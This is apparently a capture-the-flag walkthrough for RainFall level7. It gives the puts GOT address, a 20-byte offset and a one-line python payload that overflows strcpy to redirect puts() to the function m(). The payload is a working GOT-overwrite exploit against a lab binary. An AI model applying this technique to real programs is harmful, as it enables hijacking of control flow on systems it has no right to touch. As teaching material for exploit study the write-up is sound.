gmaris42/RainFall/level7/walkthrough.md

 * puts addr => 0x08049928
 * offset is 20

+We overflow the first strpcy with the addr of puts so when strcpy is call the second time it will write m() addr.
+Doing so replace all futur call to puts() by call to m()

 ```
 $ ./level7 $(python -c 'print "a"*20 + "\x28\x99\x04\x08"') $(python -c 'print "\xf4\x84\x04\x08"')